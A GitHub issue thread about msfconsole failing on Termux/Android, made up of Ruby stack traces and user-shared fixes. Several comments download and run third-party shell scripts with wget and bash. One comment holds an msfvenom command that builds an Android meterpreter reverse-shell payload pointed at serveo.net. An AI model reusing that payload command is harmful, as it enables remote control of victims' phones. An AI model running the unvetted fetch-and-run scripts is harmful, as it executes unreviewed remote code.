### ISSUE TITLE
msfconsole didn't work

### ISSUE THREAD

**Issue by xwqqqqq** [rapid7/metasploit-framework#11492]
## Steps to reproduce

How'd you do it?

  1.  I installed the metasploit on termux. I have tried to reinstall termux but it didn't work. The issue shows up even if removing the app-data of termux.
  2.  This issue came out after an uninstall of termux, but I successfully installed it on termux before that.
  The way I install:
     cd $HOME
     pkg install wget
     wget https://Auxilus.github.io/metasploit.sh
     bash metasploit.sh
  During the installation, there's no error (at least seems to be)
## Current behavior
$ ./msfconsole 
metasploit-credential not in the bundle, so Metasploit::Credential creation will fail for Msf::DBManager
Traceback (most recent call last):
	31: from ./msfconsole:48:in `<main>'
	30: from ./msfconsole:48:in `require'
	29: from /data/data/com.termux/files/home/metasploit-framework/lib/msf/core/payload_generator.rb:2:in `<top (required)>'
	28: from /data/data/com.termux/files/home/metasploit-framework/lib/msf/core/payload_generator.rb:2:in `require'
	27: from /data/data/com.termux/files/home/metasploit-framework/lib/msf/core/payload/apk.rb:3:in `<top (required)>'
	26: from /data/data/com.termux/files/home/metasploit-framework/lib/msf/core/payload/apk.rb:3:in `require'
	25: from /data/data/com.termux/files/home/metasploit-framework/lib/msf/core.rb:59:in `<top (required)>'
	24: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/backports-3.12.0/lib/backports/std_lib.rb:9:in `require_with_backports'
	23: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/backports-3.12.0/lib/backports/std_lib.rb:9:in `require'
	22: from /data/data/com.termux/files/home/metasploit-framework/lib/msf/core/db_manager.rb:24:in `<top (required)>'
	21: from /data/data/com.termux/files/home/metasploit-framework/lib/msf/core/db_manager.rb:65:in `<class:DBManager>'
	20: from /data/data/com.termux/files/home/metasploit-framework/lib/metasploit/framework/require.rb:115:in `optionally_include_metasploit_credential_creation'
	19: from /data/data/com.termux/files/home/metasploit-framework/lib/metasploit/framework/require.rb:68:in `optionally_include_metasploit_credential_creation'
	18: from /data/data/com.termux/files/home/metasploit-framework/lib/metasploit/framework/require.rb:22:in `optionally'
	17: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/backports-3.12.0/lib/backports/std_lib.rb:9:in `require_with_backports'
	16: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/backports-3.12.0/lib/backports/std_lib.rb:9:in `require'
	15: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/metasploit-credential-3.0.3/lib/metasploit/credential.rb:11:in `<top (required)>'
	14: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/backports-3.12.0/lib/backports/std_lib.rb:9:in `require_with_backports'
	13: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/backports-3.12.0/lib/backports/std_lib.rb:9:in `require'
	12: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/metasploit_data_models-3.0.5/lib/metasploit_data_models.rb:15:in `<top (required)>'
	11: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/backports-3.12.0/lib/backports/std_lib.rb:9:in `require_with_backports'
	10: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/backports-3.12.0/lib/backports/std_lib.rb:9:in `require'
	 9: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activerecord-4.2.11/lib/active_record.rb:32:in `<top (required)>'
	 8: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activerecord-4.2.11/lib/active_record.rb:130:in `<module:ActiveRecord>'
	 7: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/backports-3.12.0/lib/backports/std_lib.rb:9:in `require_with_backports'
	 6: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/backports-3.12.0/lib/backports/std_lib.rb:9:in `require'
	 5: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activerecord-4.2.11/lib/active_record/connection_adapters/abstract_adapter.rb:3:in `<top (required)>'
	 4: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/backports-3.12.0/lib/backports/std_lib.rb:9:in `require_with_backports'
	 3: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/backports-3.12.0/lib/backports/std_lib.rb:9:in `require'
	 2: from /data/data/com.termux/files/usr/lib/ruby/2.6.0/bigdecimal/util.rb:9:in `<top (required)>'
	 1: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/backports-3.12.0/lib/backports/std_lib.rb:9:in `require_with_backports'
/data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/backports-3.12.0/lib/backports/std_lib.rb:9:in `require': dlopen failed: cannot locate symbol "rmpd_util_str_to_d" referenced by "/data/data/com.termux/files/usr/lib/ruby/2.6.0/aarch64-linux-android/bigdecimal/util.so"... - /data/data/com.termux/files/usr/lib/ruby/2.6.0/aarch64-linux-android/bigdecimal/util.so (LoadError)
	14: from ./msfconsole:48:in `<main>'
	13: from ./msfconsole:48:in `require'
	12: from /data/data/com.termux/files/home/metasploit-framework/lib/msf/core/payload_generator.rb:2:in `<top (required)>'
	11: from /data/data/com.termux/files/home/metasploit-framework/lib/msf/core/payload_generator.rb:2:in `require'
	10: from /data/data/com.termux/files/home/metasploit-framework/lib/msf/core/payload/apk.rb:3:in `<top (required)>'
	 9: from /data/data/com.termux/files/home/metasploit-framework/lib/msf/core/payload/apk.rb:3:in `require'
	 8: from /data/data/com.termux/files/home/metasploit-framework/lib/msf/core.rb:59:in `<top (required)>'
	 7: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/backports-3.12.0/lib/backports/std_lib.rb:9:in `require_with_backports'
	 6: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/backports-3.12.0/lib/backports/std_lib.rb:9:in `require'
	 5: from /data/data/com.termux/files/home/metasploit-framework/lib/msf/core/db_manager.rb:24:in `<top (required)>'
	 4: from /data/data/com.termux/files/home/metasploit-framework/lib/msf/core/db_manager.rb:65:in `<class:DBManager>'
	 3: from /data/data/com.termux/files/home/metasploit-framework/lib/metasploit/framework/require.rb:115:in `optionally_include_metasploit_credential_creation'
	 2: from /data/data/com.termux/files/home/metasploit-framework/lib/metasploit/framework/require.rb:68:in `optionally_include_metasploit_credential_creation'
	 1: from /data/data/com.termux/files/home/metasploit-framework/lib/metasploit/framework/require.rb:20:in `optionally'
/data/data/com.termux/files/home/metasploit-framework/lib/metasploit/framework/require.rb:25:in `rescue in optionally': undefined method `without' for #<Bundler::Settings:0x0000007385964468> (NoMethodError)

### Metasploit version

Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneline` for a source install).

### I installed Metasploit with:
- [ ] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [x] Source install (please specify ruby version)
$ ruby --version
ruby 2.6.1p33 (2019-01-30 revision 66950) [aarch64-linux-android]

### OS

What OS are you running Metasploit on?
OS: Android 9 aarch64

**Comment by bcoles** [comment]
Termux is not officially supported. #11023

However, Metasploit reportedly does work with Termux.

Refer to the following for more information:

* https://wiki.termux.com/wiki/Metasploit_Framework
* termux/termux-packages/issues/715

**Comment by 21MRunknown12** [comment]
Is there any fix ?

**Comment by h00die** [comment]
Ask the termux people, metasploit already gave their response.

**Comment by AadiRajUthup** [comment]
I also get the same error

**Comment by AadiRajUthup** [comment]
Even with other metasploit installers 😢

**Comment by h00die** [comment]
Please stop posting to this. The issue is not related to metasploit and therefore you won't receive help. Seek help on the termux pages/site, they will be able to assist

**Comment by AadiRajUthup** [comment]
Ok

**Comment by 21MRunknown12** [comment]
try this: 

wget https://github.com/termux/termux-packages/files/2912002/fix-ruby-bigdecimal.sh.txt
bash fix-ruby-bigdecimal.sh.txt

and this after the one above:

patchelf --print-needed $PREFIX/lib/ruby/2.6.0/aarch64-linux-android/bigdecimal/util.so

**Comment by 21MRunknown12** [comment]
it worked for me

**Comment by al3mo** [comment]
Thanks for the 😘

**Comment by L1LJ3PPE** [comment]
https://www.youtube.com/watch?v=Cuj7qWNBfY8

**Comment by verryali** [comment]
thank bro worked for me

**Comment by W0lweR** [comment]
Thanks!

**Comment by shaheem007** [comment]
msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R
/data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11.1/lib/active_support/core_ext/object/duplicable.rb:111: warning: BigDecimal.new is deprecated; use BigDecimal() method instead. 



how to fix

**Comment by timwr** [comment]
`data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11.1/lib/active_support/core_ext/object/duplicable.rb:111: warning: BigDecimal.new is deprecated; use BigDecimal() method instead.` is just a warning, you can ignore it for now.

**Comment by jsn-OO7** [comment]
@@21MRunknown12
21MRunknown12 What about arm?

**Comment by jsn-OO7** [comment]
$PREFIX/lib/ruby/2.6.0/aarch64-linux-android/bigdecimal/util.so

**Comment by jsn-OO7** [comment]
Traceback (most recent call last):
        14: from ./beef:44:in `<main>'
        13: from /data/data/com.termux/files/usr/lib/ruby/site_ruby/2.6.0/rubygems/core_ext/kernel_require.rb:54:in `require'
        12: from /data/data/com.termux/files/usr/lib/ruby/site_ruby/2.6.0/rubygems/core_ext/kernel_require.rb:54:in `require'
        11: from /data/data/com.termux/files/home/beef/core/loader.rb:16:in `<top (required)>'
        10: from /data/data/com.termux/files/usr/lib/ruby/site_ruby/2.6.0/bundler.rb:114:in `require'
         9: from /data/data/com.termux/files/usr/lib/ruby/site_ruby/2.6.0/bundler/runtime.rb:65:in `require'
         8: from /data/data/com.termux/files/usr/lib/ruby/site_ruby/2.6.0/bundler/runtime.rb:65:in `each'
         7: from /data/data/com.termux/files/usr/lib/ruby/site_ruby/2.6.0/bundler/runtime.rb:76:in `block in require'
         6: from /data/data/com.termux/files/usr/lib/ruby/site_ruby/2.6.0/bundler/runtime.rb:76:in `each'
         5: from /data/data/com.termux/files/usr/lib/ruby/site_ruby/2.6.0/bundler/runtime.rb:81:in `block (2 levels) in require'
         4: from /data/data/com.termux/files/usr/lib/ruby/site_ruby/2.6.0/bundler/runtime.rb:81:in `require'
         3: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/dm-core-1.2.1/lib/dm-core.rb:3:in `<top (required)>'
         2: from /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/dm-core-1.2.1/lib/dm-core.rb:3:in `require'
         1: from /data/data/com.termux/files/usr/lib/ruby/2.6.0/bigdecimal/util.rb:9:in `<top (required)>'
/data/data/com.termux/files/usr/lib/ruby/2.6.0/bigdecimal/util.rb:9:in `require': dlopen failed: invalid ELF file "/data/data/com.termux/files/usr/lib/ruby/2.6.0/arm-linux-androideabi/bigdecimal/util.so" load segment[8]: p_offset (0x2000) + p_filesz (0x2ec) ( = 0x22ec) past end of file (0x22ec) - /data/data/com.termux/files/usr/lib/ruby/2.6.0/arm-linux-androideabi/bigdecimal/util.so (LoadError)

**Comment by Surwadepranav2001** [comment]
/data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11/lib/active_support/core_ext/object/duplicable.rb:111: warning: BigDecimal.new is deprecated; use BigDecimal() method instead.
Traceback (most recent call last):
        6: from msfvenom:428:in `<main>'
        5: from msfvenom:55:in `framework'
        4: from msfvenom:36:in `init_framework'
        3: from msfvenom:18:in `require_deps'
        2: from /data/data/com.termux/files/usr/lib/ruby/site_ruby/2.6.0/rubygems/core_ext/kernel_require.rb:92:in `require'
        1: from /data/data/com.termux/files/usr/lib/ruby/site_ruby/2.6.0/rubygems/core_ext/kernel_require.rb:92:in `require'
/data/data/com.termux/files/home/metasploit-framework/lib/msfenv.rb:17:in `<top (required)>': undefined method `application' for Rails:Module (NoMethodError)

**Comment by neonbeast** [comment]
> try this:
> 
> wget https://github.com/termux/termux-packages/files/2912002/fix-ruby-bigdecimal.sh.txt
> bash fix-ruby-bigdecimal.sh.txt
> 
> and this after the one above:
> 
> $PREFIX/lib/ruby/2.6.0/aarch64-linux-android/bigdecimal/util.so
> 
> THANKS TO XEFFYR

Hey bro , that prefix code is giving error, pls help!!
![Screenshot_2021-02-22-11-49-30-739_com termux](https://user-images.githubusercontent.com/66249437/108670002-21a96280-7504-11eb-9af7-3b6d501b33aa.png)

**Comment by Ajay-singh1** [comment]
Try using pkg install ruby.:)

**Comment by Athar-Saad** [comment]
> > try this:
> > wget https://github.com/termux/termux-packages/files/2912002/fix-ruby-bigdecimal.sh.txt
> > bash fix-ruby-bigdecimal.sh.txt
> > and this after the one above:
> > $PREFIX/lib/ruby/2.6.0/aarch64-linux-android/bigdecimal/util.so
> > THANKS TO XEFFYR
> 
> Hey bro , that prefix code is giving error, pls help!! ![Screenshot_2021-02-22-11-49-30-739_com termux](https://user-images.githubusercontent.com/66249437/108670002-21a96280-7504-11eb-9af7-3b6d501b33aa.png)

Try this:
$PREFIX/lib/ruby/2.6.0/arm-linux-androideabi/bigdecimal/util.so

**Comment by shivamp4** [comment]
> try this: 
> 
> wget https://github.com/termux/termux-packages/files/2912002/fix-ruby-bigdecimal.sh.txt
> bash fix-ruby-bigdecimal.sh.txt
> 
> and this after the one above:
> 
> $PREFIX/lib/ruby/2.6.0/aarch64-linux-android/bigdecimal/util.so
> 
> THANKS TO XEFFYR

 
Now I'm getting this error!

bash: /data/data/com.termux/files/usr/lib/ruby/2.6.0/aarch64-linux-android/bigdecimal/util.so: No such file or directory
